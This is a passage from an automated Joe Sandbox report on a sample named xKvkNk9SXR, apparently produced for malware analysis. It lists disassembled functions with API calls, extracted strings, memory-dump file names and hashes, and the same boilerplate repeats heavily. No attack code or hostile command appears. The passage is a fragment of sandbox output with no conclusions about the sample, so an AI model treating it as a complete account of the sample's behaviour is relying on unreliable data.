                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_unchecked1H_prolog3_
                                          • String ID: 0123456789-$0123456789-
                                          • API String ID: 156722996-2494171821
                                          • Opcode ID: 8281b5832e480ec1d88988336fe52afee5696f3686fcc79427ff07c84b5ed2f5
                                          • Instruction ID: 904954ebdc99f393d95c6648e57bc0da9d7ddb1c9aa2ae1fc7a5a02a4ab3beec
                                          • Opcode Fuzzy Hash: 8281b5832e480ec1d88988336fe52afee5696f3686fcc79427ff07c84b5ed2f5
                                          • Instruction Fuzzy Hash: 65417631900259EFCF05DFA8C980BEEBBB6FF44310F100099F911AB252CB749A16CBA1
                                          Function 00A7AE50 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                                          Download Yara Rule
                                          APIs
                                          • __alloca_probe_16.LIBCMT ref: 00A7AEB9
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 00A7AF16
                                          • __freea.LIBCMT ref: 00A7AF1F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide__alloca_probe_16__freea
                                          • String ID: w#G!
                                          • API String ID: 3062693170-519468572
                                          • Opcode ID: d74679042bda2c624dd5817adfab129c0e59e5ecbdd9daccea08e0248539612d
                                          • Instruction ID: cb89671d27e2994e60f81689749e173dfc3b061e0683cc543115997ccd420876
                                          • Opcode Fuzzy Hash: d74679042bda2c624dd5817adfab129c0e59e5ecbdd9daccea08e0248539612d
                                          • Instruction Fuzzy Hash: BD31B172A0011AABDF249F65CD45DAFBBB5EB90710B18C268FD18DB190DB34DD80C791
                                          Function 00A10470 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A10582
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: : Missing required parameter '$w#G!$w#G!
                                          • API String ID: 2005118841-2204151072
                                          • Opcode ID: 3a40f4d46767e02dac993cf31a324e42e4110920c88327a7b0e29b39e8cef0fb
                                          • Instruction ID: 4dba42eb853acd671f9c2709ff00b58b6d87d15465ed81aeec99c17fec243363
                                          • Opcode Fuzzy Hash: 3a40f4d46767e02dac993cf31a324e42e4110920c88327a7b0e29b39e8cef0fb
                                          • Instruction Fuzzy Hash: 603170B1900248ABCB15DBA4CD55FEFB7B9FF84314F0445A9F906A7381DB74AA44CBA0
                                          Function 00A10590 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A106A2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: : Missing required parameter '$w#G!$w#G!
                                          • API String ID: 2005118841-2204151072
                                          • Opcode ID: e4d5c8604cc1dd0761f38ca0c278f48370afd9b2be2c3412e379f681db0ab71d
                                          • Instruction ID: 5334b10ae999670a4223faf07352a4466b0e564ea8f68bd1257087d8a75f4c31
                                          • Opcode Fuzzy Hash: e4d5c8604cc1dd0761f38ca0c278f48370afd9b2be2c3412e379f681db0ab71d
                                          • Instruction Fuzzy Hash: 113170B1900248ABCB15DBA4CD55FEFB7B9FF84314F0445A9F906A7381DB74AA44CBA0
                                          Function 009FEA50 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009FEB4B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: InputBuffer$StringStore: missing InputBuffer argument$w#G!
                                          • API String ID: 2005118841-226832382
                                          • Opcode ID: ac278d42b1fd999e2e167be107e65ec131aa2b2102e7531e68cbca914edafe93
                                          • Instruction ID: 6549ad9b06c607bfb0072439543a771d2036a6ad93e2b84e10ffc5c2dcb74973
                                          • Opcode Fuzzy Hash: ac278d42b1fd999e2e167be107e65ec131aa2b2102e7531e68cbca914edafe93
                                          • Instruction Fuzzy Hash: 62316970A00348EFDB14CFA8C955BAEBBF4FF49310F108569E416AB380DB74A908CB90
                                          Function 009B5130 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94COMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateSemaphoreA.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 009B5198
                                          • CreateSemaphoreA.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 009B51AC
                                          • CreateSemaphoreA.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 009B51C0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CreateSemaphore
                                          • String ID: w#G!
                                          • API String ID: 1078844751-519468572
                                          • Opcode ID: 645360fd41933ffed117fcc3ad8c8ef0379e638ca433facabfb9aa2d5f10bfb4
                                          • Instruction ID: d8d007a00d4ab793917661b9000d92270560d31331dc68f0111ad150c91688c8
                                          • Opcode Fuzzy Hash: 645360fd41933ffed117fcc3ad8c8ef0379e638ca433facabfb9aa2d5f10bfb4
                                          • Instruction Fuzzy Hash: FD319170A44705AFD720EF69DD02B9ABBE8EF40720F10462DF565AB2D1DBB0A904CB91
                                          Function 00A05180 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: __aullrem$Exception@8Throw
                                          • String ID: w#G!
                                          • API String ID: 4166652736-519468572
                                          • Opcode ID: bcd6c1afb066a4e58918ff6d820fe2e5f6cac310daf0b433dcfdfc40d1f6a921
                                          • Instruction ID: 43659c069dac4de0a9470db567f1518e8062e0629649f78d93d02db7abaf2506
                                          • Opcode Fuzzy Hash: bcd6c1afb066a4e58918ff6d820fe2e5f6cac310daf0b433dcfdfc40d1f6a921
                                          • Instruction Fuzzy Hash: 42212536D01A1E9BCB24DB78DD90FABB7A8EF98300F050529E9009B584E731EE04CF51
                                          Function 009B60C0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 81COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009B610E
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 009B6162
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionException@8RaiseThrow___std_exception_copy
                                          • String ID: Clone() is not implemented yet.$w#G!
                                          • API String ID: 640887848-701921529
                                          • Opcode ID: 86fd37f9fcfa039013af08d9891959c7e11e685d1dc577d948e34d99205b7b61
                                          • Instruction ID: a6f3cf21db58b9143eccd012550042b01c5d82dcb8f9bc35f26174108e6f02d1
                                          • Opcode Fuzzy Hash: 86fd37f9fcfa039013af08d9891959c7e11e685d1dc577d948e34d99205b7b61
                                          • Instruction Fuzzy Hash: 3A214172900649AFCB01DF55D941F9EF7FCFB59710F11466AE911A3640E774AA04CB90
                                          Function 00A76DA2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: w#G!
                                          • API String ID: 0-519468572
                                          • Opcode ID: d793f543176f0b1c99b572d6b591dedc3c20c42d1722a4dd46d95aaa2f7f2bbe
                                          • Instruction ID: 0b80886b8c9edb65e4dfe63caa67b89189a4fc15aa877eb2049b5e2f5ee7190b
                                          • Opcode Fuzzy Hash: d793f543176f0b1c99b572d6b591dedc3c20c42d1722a4dd46d95aaa2f7f2bbe
                                          • Instruction Fuzzy Hash: 1E11E676A01B08DFEB11BBB4DE417AE37B49F09720F408155F5088B292DBB4894187B1
                                          Function 009B2980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 009B29AB
                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 009B29FA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                          • String ID: bad locale name$w#G!
                                          • API String ID: 3988782225-1299196660
                                          • Opcode ID: dcb78d8b2143258e5247f8186b5167cb433ff3728394ddf8cae02e42157dadd6
                                          • Instruction ID: ddd8c20903566d772f3ab7f4eac11bfa39ae32445625e4abb76716832efe4ce4
                                          • Opcode Fuzzy Hash: dcb78d8b2143258e5247f8186b5167cb433ff3728394ddf8cae02e42157dadd6
                                          • Instruction Fuzzy Hash: 0E119E71905B44AFD320CF69C901B47BBE8FF19710F008A2EE899C7B81D7B5A504CB95
                                          Function 009B50A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateEventA.KERNEL32(?,?,?,?,21472377,w#G!w#G!,?,00A3FCE2,?,21472377,w#G!,?,?,?,00000000,00000000), ref: 009B50D4
                                          • CloseHandle.KERNEL32(00000000,?,00A3FCE2,?,21472377,w#G!,?,?,?,00000000,00000000,21472377,21472377), ref: 009B50EF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CloseCreateEventHandle
                                          • String ID: w#G!$w#G!w#G!
                                          • API String ID: 3369476804-2921573523
                                          • Opcode ID: 90542a2a6ad427e30c3cefac86a1e5b311e6923b4e6c2809294e3351220ea5f3
                                          • Instruction ID: 8d97d48b864b38f596a8e5209e2f52cec994f07421ef5dcf3750729ad3cc6e97
                                          • Opcode Fuzzy Hash: 90542a2a6ad427e30c3cefac86a1e5b311e6923b4e6c2809294e3351220ea5f3
                                          • Instruction Fuzzy Hash: B101C876A08604AFDB15DF6CDD01BAAB7ECEB44714F14866EEC15D3740EB31EC008690
                                          Function 009E01A0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009E021F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: OutputStringPointer$StringSink: OutputStringPointer not specified$w#G!
                                          • API String ID: 2005118841-3848619065
                                          • Opcode ID: 553e2f4e3c3495f63d226b9ac534c5ba5807b2aa79e431acbd00cfc655a33d45
                                          • Instruction ID: deace2feb90985efef0f22122e7aa7b53a6ad741abba1a58c3f9dcf72e1b0379
                                          • Opcode Fuzzy Hash: 553e2f4e3c3495f63d226b9ac534c5ba5807b2aa79e431acbd00cfc655a33d45
                                          • Instruction Fuzzy Hash: 62017171944648EBCB05DF94CD42FDEB7BCFB48714F108966E911A7281DB71AD058B50
                                          Function 00A40250 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenEventA.KERNEL32(00100002,00000000,00000000,21472377,?,?,?,00A89950,000000FF), ref: 00A402A0
                                          • CloseHandle.KERNEL32(?,?,?,?,00A89950,000000FF), ref: 00A402B5
                                            • Part of subcall function 00A3FF40: GetCurrentProcessId.KERNEL32(00000000,00A3F405,00000000,?,21472377), ref: 00A3FFDC
                                          • SetEvent.KERNEL32(?,21472377,?,?,?,00A89950,000000FF), ref: 00A402C3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Event$CloseCurrentHandleOpenProcess
                                          • String ID: w#G!
                                          • API String ID: 1808840098-519468572
                                          • Opcode ID: 5e8c7e44edfcaf07342b8e787d641bfcd75e41582101d796e3239351293a6c8d
                                          • Instruction ID: 91cfd03674fb34b1b9c5c8c5cef4cb2f9d75f81df0c0310bbbdbf794f8b7cb2d
                                          • Opcode Fuzzy Hash: 5e8c7e44edfcaf07342b8e787d641bfcd75e41582101d796e3239351293a6c8d
                                          • Instruction Fuzzy Hash: F1118E36A01614AFCB22CF25CC09F96B7B8FB45B30F05436AFE1893690DB70A9058AD0
                                          Function 00A843C9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3_catch.LIBCMT ref: 00A843D0
                                          • make_shared.LIBCPMT ref: 00A8441B
                                            • Part of subcall function 00A840B0: __EH_prolog3.LIBCMT ref: 00A840B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: H_prolog3H_prolog3_catchmake_shared
                                          • String ID: MOC$RCC
                                          • API String ID: 1798871530-2084237596
                                          • Opcode ID: 46da291a125ced50f701cb06473506cd207f2f7d4cd05da71f5f3b89ced3aa2f
                                          • Instruction ID: f83eac512282dcd0f99d0de06c95fbfbe32f435f5bd09a4416efb07fc197fa9f
                                          • Opcode Fuzzy Hash: 46da291a125ced50f701cb06473506cd207f2f7d4cd05da71f5f3b89ced3aa2f
                                          • Instruction Fuzzy Hash: 29F06235605256CFCB11BF68D5426AC3B70BF5A741B454091F8026B225CB385E49CFA3
                                          Function 00A46133 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A46163
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A46171
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                          • String ID: pScheduler$version
                                          • API String ID: 1687795959-3154422776
                                          • Opcode ID: bf1c642210d4b5c1c58e529c3712339a4dd60306b2fdb85a0ba56533ff5a2815
                                          • Instruction ID: 722b16baaff185f21ed11681d98be4d951a17f8471dbb0693b58edffc954858c
                                          • Opcode Fuzzy Hash: bf1c642210d4b5c1c58e529c3712339a4dd60306b2fdb85a0ba56533ff5a2815
                                          • Instruction Fuzzy Hash: CFE07D38A0020CF6CF00FB58DA0BFDC33A87F44305F0088657A04220D2C7B0A688C742
                                          Function 00A5A2FA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,Dflt,00A59233,?,00AC9A68,?,?,?,?,?,?,?), ref: 00A5A308
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A5A316
                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?), ref: 00A5A31F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorLast$Value___vcrt_
                                          • String ID: Dflt
                                          • API String ID: 483936075-3880269418
                                          • Opcode ID: 61ac216b51f247a5b82e4ffafc217f7bbe7881c3819109d0261f0ebe1183b1c4
                                          • Instruction ID: d848c86686f13374f5c7a21d386b5883e074460b99651e03369cb47ddeb2a36c
                                          • Opcode Fuzzy Hash: 61ac216b51f247a5b82e4ffafc217f7bbe7881c3819109d0261f0ebe1183b1c4
                                          • Instruction Fuzzy Hash: 91D0EC3A7152125B8E109BB5BC098E67AB6F6912763154732E511C2094DB78944B9650
                                          Function 00A2C6B5 Relevance: 6.3, APIs: 4, Instructions: 289COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
